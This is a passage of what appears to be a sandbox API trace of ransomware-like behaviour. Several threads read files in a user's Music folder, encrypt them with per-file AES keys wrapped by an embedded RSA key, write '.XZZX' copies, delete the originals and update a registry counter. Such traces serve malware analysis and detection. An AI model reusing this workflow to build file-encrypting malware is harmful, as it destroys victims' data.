WriteFile (in: hFile=0x5f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x492e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x492e438*=0x5, lpOverlapped=0x0) returned 1 [0050.146] SetFilePointer (in: hFile=0x5f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x62fb [0050.146] WriteFile (in: hFile=0x5f8, lpBuffer=0x492f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x492e438, lpOverlapped=0x0 | out: lpBuffer=0x492f860*, lpNumberOfBytesWritten=0x492e438*=0x14, lpOverlapped=0x0) returned 1 [0050.146] SetFilePointer (in: hFile=0x5f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x630f [0050.146] WriteFile (in: hFile=0x5f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x492e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x492e438*=0x5, lpOverlapped=0x0) returned 1 [0050.146] SetFilePointer (in: hFile=0x5f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6314 [0050.146] SetErrorMode (uMode=0x1) returned 0x1 [0050.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0050.146] OutputDebugStringW (lpOutputString="end") [0050.146] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x92\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x492dbf4, pcbBinary=0x492d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x492dbf4, pcbBinary=0x492d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0050.146] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x492dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x492d3dc, pcbStructInfo=0x492d3d8 | out: pvStructInfo=0x492d3dc, pcbStructInfo=0x492d3d8) returned 1 [0050.147] CryptAcquireContextW (in: phProv=0x492d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x492d3e4*=0x3e43068) returned 1 [0050.147] CryptImportPublicKeyInfo (in: hCryptProv=0x3e43068, dwCertEncodingType=0x1, pInfo=0x42e0d50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e0d80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e0d88*, PublicKey.cUnusedBits=0x0), phKey=0x492d3ec | out: phKey=0x492d3ec*=0x3e282b8) returned 1 [0050.147] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0050.148] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0050.148] CryptEncrypt (in: hKey=0x3e282b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x492d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x492d3f0*=0x80) returned 1 [0050.148] CryptEncrypt (in: hKey=0x3e282b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e430f0*, pdwDataLen=0x492d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e430f0*, pdwDataLen=0x492d3e8*=0x80) returned 1 [0050.148] WriteFile (in: hFile=0x5f8, lpBuffer=0x3e430f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x492e438, lpOverlapped=0x0 | out: lpBuffer=0x3e430f0*, lpNumberOfBytesWritten=0x492e438*=0x80, lpOverlapped=0x0) returned 1 [0050.148] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0050.148] WriteFile (in: hFile=0x5f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x492e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x492e438*=0x5, lpOverlapped=0x0) returned 1 [0050.148] GetUserNameW (in: lpBuffer=0x492e1f8, pcbBuffer=0x492dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x492dfe0) returned 1 [0050.148] wsprintfW (in: param_1=0x492dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0050.148] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x492dfe4 | out: phkResult=0x492dfe4*=0x5fc) returned 0x0 [0050.148] RegQueryValueExW (in: hKey=0x5fc, lpValueName="E1010314", lpReserved=0x0, lpType=0x492dfd8, lpData=0x492dfec, lpcbData=0x492dfdc*=0x4 | out: lpType=0x492dfd8*=0x4, lpData=0x492dfec*=0x53, lpcbData=0x492dfdc*=0x4) returned 0x0 [0050.148] RegCloseKey (hKey=0x5fc) returned 0x0 [0050.148] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x492dfe8 | out: phkResult=0x492dfe8*=0x5fc) returned 0x0 [0050.148] RegSetValueExW (in: hKey=0x5fc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x492dfec*=0x54, cbData=0x4 | out: lpData=0x492dfec*=0x54) returned 0x0 [0050.148] RegCloseKey (hKey=0x5fc) returned 0x0 [0050.148] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0050.149] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0050.149] CloseHandle (hObject=0x5f8) returned 1 [0050.150] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0050.150] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0050.150] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8YglZU.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\8yglzu.wav")) returned 1 [0050.151] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8YglZU.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\8yglzu.wav")) returned 0 Thread: id = 180 os_tid = 0xb24 [0049.854] lstrcpyA (in: lpString1=0x4a8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0049.854] lstrcpyW (in: lpString1=0x4a8f460, lpString2="Ae42UeoE.wav" | out: lpString1="Ae42UeoE.wav") returned="Ae42UeoE.wav" [0049.854] lstrcpyW (in: lpString1=0x4a8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0049.854] SetErrorMode (uMode=0x1) returned 0x1 [0049.854] lstrcpyW (in: lpString1=0x4a8f860, lpString2="Ae42UeoE.wav" | out: lpString1="Ae42UeoE.wav") returned="Ae42UeoE.wav" [0049.854] CoCreateGuid (in: pguid=0x4a8e440 | out: pguid=0x4a8e440*(Data1=0xe01cefe8, Data2=0x5a92, Data3=0x46b2, Data4=([0]=0x8b, [1]=0xaf, [2]=0xb8, [3]=0x81, [4]=0x19, [5]=0x75, [6]=0x53, [7]=0x70))) returned 0x0 [0049.854] wsprintfW (in: param_1=0x4a8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Ae42UeoE.wav") returned 52 [0049.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x4a8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0049.854] wsprintfW (in: param_1=0x4a8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FCD862501902E584E01CEFE81DABC9CC.XZZX") returned 77 [0049.854] StrStrW (lpFirst="Ae42UeoE.wav", lpSrch="XZZX") returned 0x0 [0049.854] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Ae42UeoE.wav", dwFileAttributes=0x20) returned 1 [0049.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Ae42UeoE.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ae42ueoe.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e8 [0049.855] ReadFile (in: hFile=0x5e8, lpBuffer=0x3e4b438, nNumberOfBytesToRead=0x1175, lpNumberOfBytesRead=0x4a8e418, lpOverlapped=0x0 | out: lpBuffer=0x3e4b438*, lpNumberOfBytesRead=0x4a8e418*=0x1175, lpOverlapped=0x0) returned 1 [0049.855] CloseHandle (hObject=0x5e8) returned 1 [0049.855] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3ef0000 [0049.856] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3f00000 [0049.856] SetErrorMode (uMode=0x1) returned 0x1 [0049.856] lstrcpyW (in: lpString1=0x4a8e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0049.856] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e42e48) returned 1 [0049.859] CryptGenKey (in: hProv=0x3e42e48, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e28338) returned 1 [0050.433] CryptExportKey (in: hKey=0x3e28338, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x4a8e41c | out: pbData=0x0*, pdwDataLen=0x4a8e41c*=0x94) returned 1 [0050.433] CryptExportKey (in: hKey=0x3e28338, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3f00000, pdwDataLen=0x4a8e41c | out: pbData=0x3f00000*, pdwDataLen=0x4a8e41c*=0x94) returned 1 [0050.433] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0050.434] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0050.434] CryptDestroyKey (hKey=0x3e28338) returned 1 [0050.434] CryptReleaseContext (hProv=0x3e43310, dwFlags=0x0) returned 0 [0050.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FCD862501902E584E01CEFE81DABC9CC.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fcd862501902e584e01cefe81dabc9cc.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x600 [0050.434] WriteFile (in: hFile=0x600, lpBuffer=0x3e4b438*, nNumberOfBytesToWrite=0x1175, lpNumberOfBytesWritten=0x4a8e438, lpOverlapped=0x0 | out: lpBuffer=0x3e4b438*, lpNumberOfBytesWritten=0x4a8e438*=0x1175, lpOverlapped=0x0) returned 1 [0050.435] SetFilePointer (in: hFile=0x600, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1175 [0050.435] WriteFile (in: hFile=0x600, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4a8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4a8e438*=0x5, lpOverlapped=0x0) returned 1 [0050.435] SetFilePointer (in: hFile=0x600, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x117a [0050.435] WriteFile (in: hFile=0x600, lpBuffer=0x4a8f860*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x4a8e438, lpOverlapped=0x0 | out: lpBuffer=0x4a8f860*, lpNumberOfBytesWritten=0x4a8e438*=0x18, lpOverlapped=0x0) returned 1 [0050.435] SetFilePointer (in: hFile=0x600, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1192 [0050.435] WriteFile (in: hFile=0x600, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4a8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4a8e438*=0x5, lpOverlapped=0x0) returned 1 [0050.435] SetFilePointer (in: hFile=0x600, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1197 [0050.435] SetErrorMode (uMode=0x1) returned 0x1 [0050.435] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0050.435] OutputDebugStringW (lpOutputString="end") [0050.435] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x4a8dbf4, pcbBinary=0x4a8d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x4a8dbf4, pcbBinary=0x4a8d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0050.435] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x4a8dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x4a8d3dc, pcbStructInfo=0x4a8d3d8 | out: pvStructInfo=0x4a8d3dc, pcbStructInfo=0x4a8d3d8) returned 1 [0050.435] CryptAcquireContextW (in: phProv=0x4a8d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x4a8d3e4*=0x3e43398) returned 1 [0050.436] CryptImportPublicKeyInfo (in: hCryptProv=0x3e43398, dwCertEncodingType=0x1, pInfo=0x42e0ef0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e0f20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e0f28*, PublicKey.cUnusedBits=0x0), phKey=0x4a8d3ec | out: phKey=0x4a8d3ec*=0x3e28338) returned 1 [0050.436] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0050.436] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0050.436] CryptEncrypt (in: hKey=0x3e28338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x4a8d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x4a8d3f0*=0x80) returned 1 [0050.436] CryptEncrypt (in: hKey=0x3e28338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e43420*, pdwDataLen=0x4a8d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e43420*, pdwDataLen=0x4a8d3e8*=0x80) returned 1 [0050.437] WriteFile (in: hFile=0x600, lpBuffer=0x3e43420*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x4a8e438, lpOverlapped=0x0 | out: lpBuffer=0x3e43420*, lpNumberOfBytesWritten=0x4a8e438*=0x80, lpOverlapped=0x0) returned 1 [0050.437] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0050.437] WriteFile (in: hFile=0x600, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4a8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4a8e438*=0x5, lpOverlapped=0x0) returned 1 [0050.437] GetUserNameW (in: lpBuffer=0x4a8e1f8, pcbBuffer=0x4a8dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x4a8dfe0) returned 1 [0050.437] wsprintfW (in: param_1=0x4a8dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0050.437] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x4a8dfe4 | out: phkResult=0x4a8dfe4*=0x604) returned 0x0 [0050.437] RegQueryValueExW (in: hKey=0x604, lpValueName="E1010314", lpReserved=0x0, lpType=0x4a8dfd8, lpData=0x4a8dfec, lpcbData=0x4a8dfdc*=0x4 | out: lpType=0x4a8dfd8*=0x4, lpData=0x4a8dfec*=0x55, lpcbData=0x4a8dfdc*=0x4) returned 0x0 [0050.437] RegCloseKey (hKey=0x604) returned 0x0 [0050.437] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x4a8dfe8 | out: phkResult=0x4a8dfe8*=0x604) returned 0x0 [0050.437] RegSetValueExW (in: hKey=0x604, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x4a8dfec*=0x56, cbData=0x4 | out: lpData=0x4a8dfec*=0x56) returned 0x0 [0050.437] RegCloseKey (hKey=0x604) returned 0x0 [0050.437] VirtualFree (lpAddress=0x3ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0050.438] VirtualFree (lpAddress=0x3f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0050.438] CloseHandle (hObject=0x600) returned 1 [0050.439] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0050.439] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0050.439] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Ae42UeoE.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ae42ueoe.wav")) returned 1 [0050.440] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Ae42UeoE.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ae42ueoe.wav")) returned 0 Thread: id = 181 os_tid = 0x97c [0050.001] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0050.001] lstrcpyW (in: lpString1=0x417f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0050.001] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0050.001] SetErrorMode (uMode=0x1) returned 0x1 [0050.001] lstrcpyW (in: lpString1=0x417f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0050.001] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x82c79cc6, Data2=0x9aa5, Data3=0x4d81, Data4=([0]=0x9d, [1]=0xbf, [2]=0x8, [3]=0xba, [4]=0x61, [5]=0xed, [6]=0xa3, [7]=0xfe))) returned 0x0 [0050.001] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 51 [0050.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0050.001] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5EF7279E2ED18E2582C79CC632E9726D.XZZX") returned 77 [0050.001] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0050.001] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", dwFileAttributes=0x20) returned 1 [0050.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e0 [0050.002] ReadFile (in: hFile=0x5e0, lpBuffer=0x42d6178, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42d6178*, lpNumberOfBytesRead=0x417e418*=0x1f8, lpOverlapped=0x0) returned 1 [0050.002] CloseHandle (hObject=0x5e0) returned 1 [0050.002] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3eb0000 [0050.002] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ec0000 [0050.003] SetErrorMode (uMode=0x1) returned 0x1 [0050.003] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0050.003] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e42fe0) returned 1 [0050.005] CryptGenKey (in: hProv=0x3e42fe0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e283b8) returned 1 [0050.548] CryptExportKey (in: hKey=0x3e283b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0050.548] CryptExportKey (in: hKey=0x3e283b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ec0000, pdwDataLen=0x417e41c | out: pbData=0x3ec0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0050.548] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0050.549] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0050.549] CryptDestroyKey (hKey=0x3e283b8) returned 1 [0050.549] CryptReleaseContext (hProv=0x3e434a8, dwFlags=0x0) returned 0 [0050.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5EF7279E2ED18E2582C79CC632E9726D.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5ef7279e2ed18e2582c79cc632e9726d.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x604 [0050.550] WriteFile (in: hFile=0x604, lpBuffer=0x42d6178*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d6178*, lpNumberOfBytesWritten=0x417e438*=0x1f8, lpOverlapped=0x0) returned 1 [0050.551] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1f8 [0050.551] WriteFile (in: hFile=0x604, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, 